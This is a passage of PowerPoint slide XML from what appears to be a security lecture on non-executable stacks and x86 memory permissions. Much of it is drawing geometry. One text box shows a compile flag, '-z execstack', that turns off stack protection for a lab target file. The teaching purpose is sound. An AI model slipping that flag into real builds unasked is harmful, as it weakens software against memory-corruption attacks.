              <a:t>FC DF FF FF FF 7F 00 00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82299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System-Level Protections</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. Non-Executable Stacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21097E66-B2DC-714C-A83C-922FE0656F5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369052" y="1825625"/>
            <a:ext cx="4979504" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>16-bit &amp; 32-bit x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can mark region of memory as “read-only” or “writable”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can execute code in any region of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>64-bit x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduced “execute” permission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack is non-executable by default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3" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97148676-F5DB-084A-967C-5852ACF56F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6482945" y="1889773"/>
            <a:ext cx="4277069"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -S has-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1941E182-8981-5C45-9715-93922F0B85D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6990379" y="4330313"/>
            <a:ext cx="3240439"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-S has-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rounded Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A5D09F3-0DB0-844B-B45D-AD87A21D88FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5142968" y="2275505"/>
            <a:ext cx="6935263" cy="1547312"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="1219033472">
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="connsiteX0" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY0" fmla="*/ 257890 h 1547312"/>
                      <a:gd name="connsiteX1" fmla="*/ 257890 w 6935263"/>
                      <a:gd name="connsiteY1" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX2" fmla="*/ 841479 w 6935263"/>
                      <a:gd name="connsiteY2" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX3" fmla="*/ 1489264 w 6935263"/>
                      <a:gd name="connsiteY3" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX4" fmla="*/ 1944463 w 6935263"/>
                      <a:gd name="connsiteY4" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX5" fmla="*/ 2335468 w 6935263"/>
                      <a:gd name="connsiteY5" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX6" fmla="*/ 2790668 w 6935263"/>
                      <a:gd name="connsiteY6" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX7" fmla="*/ 3310062 w 6935263"/>
                      <a:gd name="connsiteY7" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX8" fmla="*/ 3893652 w 6935263"/>
                      <a:gd name="connsiteY8" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX9" fmla="*/ 4348851 w 6935263"/>
                      <a:gd name="connsiteY9" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX10" fmla="*/ 5060830 w 6935263"/>
                      <a:gd name="connsiteY10" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX11" fmla="*/ 5644420 w 6935263"/>
                      <a:gd name="connsiteY11" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX12" fmla="*/ 6677373 w 6935263"/>
                      <a:gd name="connsiteY12" fmla="*/ 0 h 1547312"/>
                      <a:gd name="connsiteX13" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY13" fmla="*/ 257890 h 1547312"/>
                      <a:gd name="connsiteX14" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY14" fmla="*/ 794287 h 1547312"/>
                      <a:gd name="connsiteX15" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY15" fmla="*/ 1289422 h 1547312"/>
                      <a:gd name="connsiteX16" fmla="*/ 6677373 w 6935263"/>
                      <a:gd name="connsiteY16" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX17" fmla="*/ 6029589 w 6935263"/>
                      <a:gd name="connsiteY17" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX18" fmla="*/ 5445999 w 6935263"/>
                      <a:gd name="connsiteY18" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX19" fmla="*/ 4734020 w 6935263"/>
                      <a:gd name="connsiteY19" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX20" fmla="*/ 4214626 w 6935263"/>
                      <a:gd name="connsiteY20" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX21" fmla="*/ 3759426 w 6935263"/>
                      <a:gd name="connsiteY21" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX22" fmla="*/ 3175837 w 6935263"/>
                      <a:gd name="connsiteY22" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX23" fmla="*/ 2528053 w 6935263"/>
                      <a:gd name="connsiteY23" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX24" fmla="*/ 1816074 w 6935263"/>
                      <a:gd name="connsiteY24" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX25" fmla="*/ 1168289 w 6935263"/>
                      <a:gd name="connsiteY25" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX26" fmla="*/ 257890 w 6935263"/>
                      <a:gd name="connsiteY26" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX27" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY27" fmla="*/ 1289422 h 1547312"/>
                      <a:gd name="connsiteX28" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY28" fmla="*/ 773656 h 1547312"/>
                      <a:gd name="connsiteX29" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY29" fmla="*/ 257890 h 154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35263" h="1547312" fill="none" extrusionOk="0">
                        <a:moveTo>
                          <a:pt x="0" y="257890"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="30250" y="143512"/>
                          <a:pt x="137264" y="-13036"/>
                          <a:pt x="257890" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="407126" y="-5607"/>
                          <a:pt x="629064" y="11091"/>
                          <a:pt x="841479" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1053894" y="-11091"/>
                          <a:pt x="1207174" y="46126"/>
                          <a:pt x="1489264" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1771354" y="-46126"/>
                          <a:pt x="1749938" y="37887"/>
                          <a:pt x="1944463" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2138988" y="-37887"/>
                          <a:pt x="2219125" y="6704"/>
                          <a:pt x="2335468" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2451811" y="-6704"/>
                          <a:pt x="2683103" y="2850"/>
                          <a:pt x="2790668" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2898233" y="-2850"/>
                          <a:pt x="3111207" y="8730"/>
                          <a:pt x="3310062" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3508917" y="-8730"/>
                          <a:pt x="3742663" y="53"/>
                          <a:pt x="3893652" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4044641" y="-53"/>
                          <a:pt x="4248279" y="15452"/>
                          <a:pt x="4348851" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4449423" y="-15452"/>
                          <a:pt x="4758001" y="48006"/>
                          <a:pt x="5060830" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5363659" y="-48006"/>
                          <a:pt x="5396680" y="67988"/>
                          <a:pt x="5644420" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5892160" y="-67988"/>
                          <a:pt x="6308442" y="30952"/>
                          <a:pt x="6677373" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6813188" y="-7567"/>
                          <a:pt x="6944051" y="105953"/>
                          <a:pt x="6935263" y="257890"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6972344" y="488435"/>
                          <a:pt x="6872917" y="646316"/>
                          <a:pt x="6935263" y="794287"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6997609" y="942258"/>
                          <a:pt x="6918393" y="1137994"/>
                          <a:pt x="6935263" y="1289422"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6936199" y="1422386"/>
                          <a:pt x="6821860" y="1541228"/>
                          <a:pt x="6677373" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6445607" y="1548732"/>
                          <a:pt x="6232649" y="1483025"/>
                          <a:pt x="6029589" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5826529" y="1611599"/>
                          <a:pt x="5594342" y="1487007"/>
                          <a:pt x="5445999" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5297656" y="1607617"/>
                          <a:pt x="4918240" y="1526345"/>
                          <a:pt x="4734020" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4549800" y="1568279"/>
                          <a:pt x="4369704" y="1512297"/>
                          <a:pt x="4214626" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4059548" y="1582327"/>
                          <a:pt x="3868960" y="1544839"/>
                          <a:pt x="3759426" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3649892" y="1549785"/>
                          <a:pt x="3426640" y="1484319"/>
                          <a:pt x="3175837" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2925034" y="1610305"/>
                          <a:pt x="2666536" y="1472688"/>
                          <a:pt x="2528053" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2389570" y="1621936"/>
                          <a:pt x="1993541" y="1504920"/>
                          <a:pt x="1816074" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1638607" y="1589704"/>
                          <a:pt x="1329682" y="1509881"/>
                          <a:pt x="1168289" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1006897" y="1584743"/>
                          <a:pt x="558609" y="1474495"/>
                          <a:pt x="257890" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99138" y="1545753"/>
                          <a:pt x="-35206" y="1447272"/>
                          <a:pt x="0" y="1289422"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-30148" y="1125298"/>
                          <a:pt x="61366" y="895113"/>
                          <a:pt x="0" y="773656"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-61366" y="652199"/>
                          <a:pt x="34609" y="485588"/>
                          <a:pt x="0" y="257890"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                      <a:path w="6935263" h="1547312" stroke="0" extrusionOk="0">
                        <a:moveTo>
                          <a:pt x="0" y="257890"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="-9077" y="109862"/>
                          <a:pt x="78820" y="13752"/>
                          <a:pt x="257890" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="516840" y="-51645"/>
                          <a:pt x="723035" y="4619"/>
                          <a:pt x="969869" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1216703" y="-4619"/>
                          <a:pt x="1350541" y="19209"/>
                          <a:pt x="1489264" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1627987" y="-19209"/>
                          <a:pt x="1754942" y="6496"/>
                          <a:pt x="1944463" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2133984" y="-6496"/>
                          <a:pt x="2322589" y="25800"/>
                          <a:pt x="2592247" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2861905" y="-25800"/>
                          <a:pt x="2870370" y="28988"/>
                          <a:pt x="3111642" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3352915" y="-28988"/>
                          <a:pt x="3481574" y="78120"/>
                          <a:pt x="3823621" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4165668" y="-78120"/>
                          <a:pt x="4184860" y="13511"/>
                          <a:pt x="4278821" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4372782" y="-13511"/>
                          <a:pt x="4759050" y="3998"/>
                          <a:pt x="4990800" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5222550" y="-3998"/>
                          <a:pt x="5209571" y="45993"/>
                          <a:pt x="5381805" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5554039" y="-45993"/>
                          <a:pt x="5824627" y="41485"/>
                          <a:pt x="5965394" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6106161" y="-41485"/>
                          <a:pt x="6325924" y="82700"/>
                          <a:pt x="6677373" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6848279" y="-28140"/>
                          <a:pt x="6943826" y="109940"/>
                          <a:pt x="6935263" y="257890"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6945411" y="458488"/>
                          <a:pt x="6892757" y="526992"/>
                          <a:pt x="6935263" y="773656"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6977769" y="1020320"/>
                          <a:pt x="6933495" y="1153095"/>
                          <a:pt x="6935263" y="1289422"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6925399" y="1422558"/>
                          <a:pt x="6799164" y="1516460"/>
                          <a:pt x="6677373" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6511348" y="1585305"/>
                          <a:pt x="6253414" y="1529162"/>
                          <a:pt x="6029589" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5805764" y="1565462"/>
                          <a:pt x="5737688" y="1540921"/>
                          <a:pt x="5638584" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5539480" y="1553703"/>
                          <a:pt x="5379740" y="1502689"/>
                          <a:pt x="5183384" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4987028" y="1591935"/>
                          <a:pt x="4789741" y="1499240"/>
                          <a:pt x="4471405" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4153069" y="1595384"/>
                          <a:pt x="4080245" y="1480640"/>
                          <a:pt x="3887816" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3695387" y="1613984"/>
                          <a:pt x="3607201" y="1502279"/>
                          <a:pt x="3432616" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3258031" y="1592345"/>
                          <a:pt x="3093101" y="1534870"/>
                          <a:pt x="2849027" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2604953" y="1559754"/>
                          <a:pt x="2584528" y="1530696"/>
                          <a:pt x="2458022" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2331517" y="1563928"/>
                          <a:pt x="2182191" y="1544577"/>
                          <a:pt x="2067017" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1951844" y="1550047"/>
                          <a:pt x="1662525" y="1541733"/>
                          <a:pt x="1483428" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1304331" y="1552891"/>
                          <a:pt x="1172561" y="1544179"/>
                          <a:pt x="1028228" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="883895" y="1550445"/>
                          <a:pt x="453687" y="1512448"/>
                          <a:pt x="257890" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="128060" y="1544548"/>
                          <a:pt x="17251" y="1446063"/>
                          <a:pt x="0" y="1289422"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-19216" y="1031975"/>
                          <a:pt x="14379" y="930774"/>
                          <a:pt x="0" y="753025"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-14379" y="575276"/>
                          <a:pt x="16670" y="391871"/>
                          <a:pt x="0" y="25789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hH</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6" name="Rounded Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA08D230-2021-9247-A1A1-C6477637E552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5142968" y="4736109"/>
            <a:ext cx="6935263" cy="1985366"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="1219033472">
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="connsiteX0" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY0" fmla="*/ 330901 h 1985366"/>
                      <a:gd name="connsiteX1" fmla="*/ 330901 w 6935263"/>
                      <a:gd name="connsiteY1" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX2" fmla="*/ 775746 w 6935263"/>
                      <a:gd name="connsiteY2" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX3" fmla="*/ 1157857 w 6935263"/>
                      <a:gd name="connsiteY3" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX4" fmla="*/ 1602703 w 6935263"/>
                      <a:gd name="connsiteY4" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX5" fmla="*/ 2110283 w 6935263"/>
                      <a:gd name="connsiteY5" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX6" fmla="*/ 2680597 w 6935263"/>
                      <a:gd name="connsiteY6" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX7" fmla="*/ 3125443 w 6935263"/>
                      <a:gd name="connsiteY7" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX8" fmla="*/ 3821227 w 6935263"/>
                      <a:gd name="connsiteY8" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX9" fmla="*/ 4391541 w 6935263"/>
                      <a:gd name="connsiteY9" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX10" fmla="*/ 5087325 w 6935263"/>
                      <a:gd name="connsiteY10" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX11" fmla="*/ 5720374 w 6935263"/>
                      <a:gd name="connsiteY11" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX12" fmla="*/ 6604362 w 6935263"/>
                      <a:gd name="connsiteY12" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX13" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY13" fmla="*/ 330901 h 1985366"/>
                      <a:gd name="connsiteX14" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY14" fmla="*/ 758853 h 1985366"/>
                      <a:gd name="connsiteX15" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY15" fmla="*/ 1160334 h 1985366"/>
                      <a:gd name="connsiteX16" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY16" fmla="*/ 1654465 h 1985366"/>
                      <a:gd name="connsiteX17" fmla="*/ 6604362 w 6935263"/>
                      <a:gd name="connsiteY17" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX18" fmla="*/ 5908578 w 6935263"/>
                      <a:gd name="connsiteY18" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX19" fmla="*/ 5463733 w 6935263"/>
                      <a:gd name="connsiteY19" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX20" fmla="*/ 4893418 w 6935263"/>
                      <a:gd name="connsiteY20" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX21" fmla="*/ 4260369 w 6935263"/>
                      <a:gd name="connsiteY21" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX22" fmla="*/ 3564585 w 6935263"/>
                      <a:gd name="connsiteY22" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX23" fmla="*/ 2931536 w 6935263"/>
                      <a:gd name="connsiteY23" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX24" fmla="*/ 2235752 w 6935263"/>
                      <a:gd name="connsiteY24" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX25" fmla="*/ 1602703 w 6935263"/>
                      <a:gd name="connsiteY25" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX26" fmla="*/ 1157857 w 6935263"/>
                      <a:gd name="connsiteY26" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX27" fmla="*/ 330901 w 6935263"/>
                      <a:gd name="connsiteY27" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX28" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY28" fmla="*/ 1654465 h 1985366"/>
                      <a:gd name="connsiteX29" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY29" fmla="*/ 1200041 h 1985366"/>
                      <a:gd name="connsiteX30" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY30" fmla="*/ 785325 h 1985366"/>
                      <a:gd name="connsiteX31" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY31" fmla="*/ 330901 h 198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35263" h="1985366" fill="none" extrusionOk="0">
                        <a:moveTo>
                          <a:pt x="0" y="330901"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="3476" y="132976"/>
                          <a:pt x="131627" y="-532"/>
                          <a:pt x="330901" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="464491" y="-46664"/>
                          <a:pt x="608229" y="48684"/>
                          <a:pt x="775746" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="943264" y="-48684"/>
                          <a:pt x="1020233" y="31838"/>
                          <a:pt x="1157857" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1295481" y="-31838"/>
                          <a:pt x="1393496" y="14476"/>
                          <a:pt x="1602703" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1811910" y="-14476"/>
                          <a:pt x="1992314" y="48941"/>
                          <a:pt x="2110283" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2228252" y="-48941"/>
                          <a:pt x="2499887" y="50706"/>
                          <a:pt x="2680597" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2861307" y="-50706"/>
                          <a:pt x="2929604" y="49464"/>
                          <a:pt x="3125443" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3321282" y="-49464"/>
                          <a:pt x="3531058" y="24405"/>
                          <a:pt x="3821227" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4111396" y="-24405"/>
                          <a:pt x="4215765" y="15266"/>
                          <a:pt x="4391541" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4567317" y="-15266"/>
                          <a:pt x="4896808" y="24543"/>
                          <a:pt x="5087325" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5277842" y="-24543"/>
                          <a:pt x="5441526" y="27639"/>
                          <a:pt x="5720374" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5999222" y="-27639"/>
                          <a:pt x="6377898" y="27360"/>
                          <a:pt x="6604362" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6811769" y="4227"/>
                          <a:pt x="6903459" y="159785"/>
                          <a:pt x="6935263" y="330901"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6947249" y="469426"/>
                          <a:pt x="6929529" y="637266"/>
                          <a:pt x="6935263" y="758853"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6940997" y="880440"/>
